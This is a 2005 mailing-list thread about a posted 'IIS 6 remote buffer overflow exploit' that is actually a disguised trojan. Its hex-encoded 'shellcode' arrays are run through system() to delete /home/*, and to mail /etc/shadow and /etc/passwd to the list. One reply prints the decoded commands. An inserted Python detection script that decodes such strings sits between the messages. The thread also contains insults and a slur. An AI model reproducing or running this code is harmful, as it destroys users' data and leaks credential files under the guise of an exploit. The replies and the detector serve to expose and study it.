Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Kind of like your attempt to be American :)

--- Javi Polo <[EMAIL PROTECTED]> wrote:
> On Apr/20/2005, Day Jay wrote:
>
> > You are wrong again, it's "Smashing the Stick" you
> > moron. Not smashing the stack. Ask anyone here!
> > Man, you are such a newbie. Get a clue and stop trying
> > to say the sweet code is a backdoor just because you
> > don't know how to compile software properly. You're
> > nothing but a newbie wanna be C programmer with a dick
> > in his ass and a lack of hacking skills.
>
> .
>
> Should this list be moderated?
>
> it's starting to be a pile of shit ... :/
>
> --
> Javi Polo @ VirtualSys
> Diputació 306, Enlo. 1ª 08009 Barcelona
> [T] +34 93 412 37 50 [F] +34 93 342 58 72
> http://www.virtualsys.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
not as lame as you are! Take your ham and shove it! What a faggit.

--- Ed Carp <[EMAIL PROTECTED]> wrote:
> Javi Polo wrote:
>
> > On Apr/20/2005, Day Jay wrote:
> >
> > > You are wrong again, it's "Smashing the Stick" you
> > > moron. Not smashing the stack. Ask anyone here!
> > > Man, you are such a newbie. Get a clue and stop trying
> > > to say the sweet code is a backdoor just because you
> > > don't know how to compile software properly. You're
> > > nothing but a newbie wanna be C programmer with a dick
> > > in his ass and a lack of hacking skills.
> >
> > .
> >
> > Should this list be moderated?
> >
> > it's starting to be a pile of shit ... :/
>
> Starting?? It always has - 90% of the messages here
> are pure bullshit. Fortunately, there is 10% pure
> gold here, which is the *only* reason why I'm still
> here, and I suspect that goes for a lot of other
> people here.
>
> The juvenile wanna-be crackers who post here so much
> like to use profanity to pump themselves up - to
> compensate for their lack of technical skills, no
> doubt. "Gee, I'm a real *man* because I can spin a
> clever put-down and use as much profanity as
> possible..."
>
> How incredibly lame.
> --
> Ed Carp, N7EKG
> President
> Lightspeed Software, Inc.
> Navarre, FL
> (850) 291-1563
> "Internet applications software for the rest of us"
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
The ONLY posts I don't like are posts like that, complaining about the list. Like somebody else said, the rest of this list provides great "comic relief"!

Javi Polo wrote:
> On Apr/20/2005, Day Jay wrote:
>
> > You are wrong again, it's "Smashing the Stick" you
> > moron. Not smashing the stack. Ask anyone here!
> > Man, you are such a newbie. Get a clue and stop trying
> > to say the sweet code is a backdoor just because you
> > don't know how to compile software properly. You're
> > nothing but a newbie wanna be C programmer with a dick
> > in his ass and a lack of hacking skills.
>
> .
>
> Should this list be moderated?
>
> it's starting to be a pile of shit ... :/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
I actually have two other separate e-mail accounts. One for normal mail. And one for lists. This one is reserved specifically for FD. I don't even need mail filters, having different e-mail addresses does it all for me.

On 4/21/05, Joachim Schipper <[EMAIL PROTECTED]> wrote:
> On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote:
> > Javi Polo wrote:
> >
> > > On Apr/20/2005, Day Jay wrote:
> > >
> > > > You are wrong again, it's "Smashing the Stick" you
> > > > moron. Not smashing the stack. Ask anyone here!
> > > > Man, you are such a newbie. Get a clue and stop trying
> > > > to say the sweet code is a backdoor just because you
> > > > don't know how to compile software properly. You're
> > > > nothing but a newbie wanna be C programmer with a dick
> > > > in his ass and a lack of hacking skills.
> > >
> > > .
> > >
> > > Should this list be moderated?
> > >
> > > it's starting to be a pile of shit ... :/
> >
> > Starting?? It always has - 90% of the messages here are pure bullshit.
> > Fortunately, there is 10% pure gold here, which is the *only* reason why
> > I'm still here, and I suspect that goes for a lot of other people here.
> >
> > The juvenile wanna-be crackers who post here so much like to use profanity
> > to pump themselves up - to compensate for their lack of technical skills,
> > no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and
> > use as much profanity as possible..."
> >
> > How incredibly lame.
>
> Hey, don't be too harsh on the list - most is useful, and the rest
> provides comic relief. ;-)
>
> Joachim
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote:
> Javi Polo wrote:
>
> > On Apr/20/2005, Day Jay wrote:
> >
> > > You are wrong again, it's "Smashing the Stick" you
> > > moron. Not smashing the stack. Ask anyone here!
> > > Man, you are such a newbie. Get a clue and stop trying
> > > to say the sweet code is a backdoor just because you
> > > don't know how to compile software properly. You're
> > > nothing but a newbie wanna be C programmer with a dick
> > > in his ass and a lack of hacking skills.
> >
> > .
> >
> > Should this list be moderated?
> >
> > it's starting to be a pile of shit ... :/
>
> Starting?? It always has - 90% of the messages here are pure bullshit.
> Fortunately, there is 10% pure gold here, which is the *only* reason why
> I'm still here, and I suspect that goes for a lot of other people here.
>
> The juvenile wanna-be crackers who post here so much like to use profanity
> to pump themselves up - to compensate for their lack of technical skills,
> no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and
> use as much profanity as possible..."
>
> How incredibly lame.

Hey, don't be too harsh on the list - most is useful, and the rest provides comic relief. ;-)

Joachim
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Javi Polo wrote:
> On Apr/20/2005, Day Jay wrote:
>
> > You are wrong again, it's "Smashing the Stick" you
> > moron. Not smashing the stack. Ask anyone here!
> > Man, you are such a newbie. Get a clue and stop trying
> > to say the sweet code is a backdoor just because you
> > don't know how to compile software properly. You're
> > nothing but a newbie wanna be C programmer with a dick
> > in his ass and a lack of hacking skills.
>
> .
>
> Should this list be moderated?
>
> it's starting to be a pile of shit ... :/

Starting?? It always has - 90% of the messages here are pure bullshit. Fortunately, there is 10% pure gold here, which is the *only* reason why I'm still here, and I suspect that goes for a lot of other people here.

The juvenile wanna-be crackers who post here so much like to use profanity to pump themselves up - to compensate for their lack of technical skills, no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and use as much profanity as possible..."

How incredibly lame.
--
Ed Carp, N7EKG
President
Lightspeed Software, Inc.
Navarre, FL
(850) 291-1563
"Internet applications software for the rest of us"
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
On Apr/20/2005, Day Jay wrote:

> You are wrong again, it's "Smashing the Stick" you
> moron. Not smashing the stack. Ask anyone here!
> Man, you are such a newbie. Get a clue and stop trying
> to say the sweet code is a backdoor just because you
> don't know how to compile software properly. You're
> nothing but a newbie wanna be C programmer with a dick
> in his ass and a lack of hacking skills.

.

Should this list be moderated?

it's starting to be a pile of shit ... :/

--
Javi Polo @ VirtualSys
Diputació 306, Enlo. 1ª 08009 Barcelona
[T] +34 93 412 37 50 [F] +34 93 342 58 72
http://www.virtualsys.com
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills.

Die slowly kthxbye!

--- vulcanius <[EMAIL PROTECTED]> wrote:
> Last time I checked it was Smashing the Stack, not Smashing the Stick
> moron. And why the hell do you keep reposting the code when everyone
> already knows it's a lame backdoor attempt?
>
> On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> > Yes it is you hat squad lammer newbie. Now get it to
> > work!! You fucking newbie.
> >
> > You're so lame and so is your file system.
> >
> > --- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote:
> > > perfect asshole
> > >
> > > class101
> > > Jr. Researcher
> > > Hat-Squad.com
> > >
> > > ----- Original Message -----
> > > From: "Day Jay" <[EMAIL PROTECTED]>
> > > To:
> > > Sent: Wednesday, April 20, 2005 8:15 PM
> > > Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
> > >
> > > > Sorry, the previous code was broken. This code should
> > > > work...
> > > >
> > > > Happy Owning!! :)
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Yes it is you hat squad lammer newbie. Now get it to work!! You fucking newbie.

You're so lame and so is your file system.

--- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote:
> perfect asshole
>
> class101
> Jr. Researcher
> Hat-Squad.com
>
> ----- Original Message -----
> From: "Day Jay" <[EMAIL PROTECTED]>
> To:
> Sent: Wednesday, April 20, 2005 8:15 PM
> Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
>
> > Sorry, the previous code was broken. This code should
> > work...
> >
> > Happy Owning!! :)
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Dear DIk,

You are thinking local buffer overflows with your "think: ret=(int *)&ret+2;(*ret)=(int)shellcode;"

Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's a little different!! Damn newbie! I mean, how lame are you?

--- dk <[EMAIL PROTECTED]> wrote:
> Day Jay wrote:
> > Sorry, the previous code was broken.
>
> Definitely `borken'... I didn't even see one /etc/passwd file in here!
> Less obvious calls may catch more habitual FD code runners next time
> dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;]
>
> ;-)
>
> --
> dk
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
perfect asshole

class101
Jr. Researcher
Hat-Squad.com

----- Original Message -----
From: "Day Jay" <[EMAIL PROTECTED]>
To:
Sent: Wednesday, April 20, 2005 8:15 PM
Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Cute.

shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk "

On Wed, 20 Apr 2005, Day Jay wrote:
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
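The decoding done in the reply above, as an added example that is not part of the original thread: a short Python triage script that decodes C string literals written as \x escapes and flags any array that is entirely printable text and is passed to system() or popen(). SAMPLE_C is a constructed, harmless stand-in for the posted file, and triage(), decode_literal() and the other names are chosen for this example.

```python
import re

# Constructed sample modelled on the posted file: an array named like shellcode
# that is really ASCII text handed to system(). The command here is harmless.
SAMPLE_C = r'''
char shellcode[] =
"\x65\x63\x68\x6f\x20"
"\x68\x69";

char stub [] = "\x90\x90\xcc\xc3";

main()
{
    system(shellcode);
    // system(stub);
    return 0;
}
'''

SINKS = ("system", "popen")  # libc calls that hand a string to /bin/sh
# String literals are matched first so that "//" inside a string is not a comment.
TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|//[^\n]*|/\*.*?\*/', re.S)
ARRAY_RE = re.compile(
    r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', re.S)
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]+)|\\([0-7]{1,3})|\\(.)', re.S)
CALL_RE = re.compile(r'\b(%s)\s*\(\s*(\w+)' % "|".join(SINKS))
SIMPLE = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11}


def strip_comments(src):
    """Blank out // and /* */ comments while leaving string literals intact."""
    return TOKEN_RE.sub(
        lambda m: m.group(0) if m.group(0).startswith('"') else " ", src)


def decode_literal(body):
    """Turn the inside of one C string literal into the bytes it denotes."""
    out, pos = bytearray(), 0
    for m in ESCAPE_RE.finditer(body):
        out += body[pos:m.start()].encode("latin-1", "replace")
        hexd, octd, ch = m.groups()
        if hexd is not None:
            out.append(int(hexd, 16) & 0xFF)   # \xNN (low byte kept)
        elif octd is not None:
            out.append(int(octd, 8) & 0xFF)    # \NNN octal
        else:
            out.append(SIMPLE.get(ch, ord(ch) & 0xFF))
        pos = m.end()
    out += body[pos:].encode("latin-1", "replace")
    return bytes(out)


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def triage(src):
    """Decode every char array initialiser and report which reach a shell."""
    code = strip_comments(src)
    sinks = {}
    for m in CALL_RE.finditer(code):
        sinks.setdefault(m.group(2), m.group(1))
    findings = []
    for m in ARRAY_RE.finditer(code):
        name = m.group(1)
        data = b"".join(decode_literal(s) for s in LITERAL_RE.findall(m.group(2)))
        ratio = printable_ratio(data)
        findings.append({
            "name": name,
            # Real machine code is rarely 100% printable; shell text always is.
            "decoded": data.decode("latin-1") if ratio == 1.0 else None,
            "printable": ratio,
            "sink": sinks.get(name),
            "suspicious": ratio == 1.0 and name in sinks,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_C):
        print(finding)
```

The script only reads source text and never compiles or executes the file under review.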
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Day Jay wrote:
> Sorry, the previous code was broken.

Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;]

;-)

--
dk
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
that has to be like the worst backdooring ever. The printf()'s are not even there :P

On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Sorry, the previous code was broken. This code should work...

Happy Owning!! :)

=SNIP
/* Proof of concept code
   Please don't send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

   IIS 6 Buffer Overflow Exploit

   BUG: inetinfo.exe improperly bound checks
   http requests sent longer than 6998 chars.
   Can get messy but enough testing, and we have
   found a way in.

   VENDOR STATUS: Notified
   FIX: In process

   Remote root.

   eg.
   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
   + Connecting to host...
   + Connected.
   + Inserting Shellcode...
   + Done...
   + Spawining shell..

   Microsoft Windows XP [Version 5.1.2600]
   (C) Copyright 1985-2001 Microsoft Corp.
   C:\

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

main()
{

//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);

//int socket = 0;
//double long port = 0.0;

//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE

// for(int j; j < 30; j++)
{
//Find socket remote address fault
printf(".");
}
//overtake inetinfo here IIS_66^
return 0;
}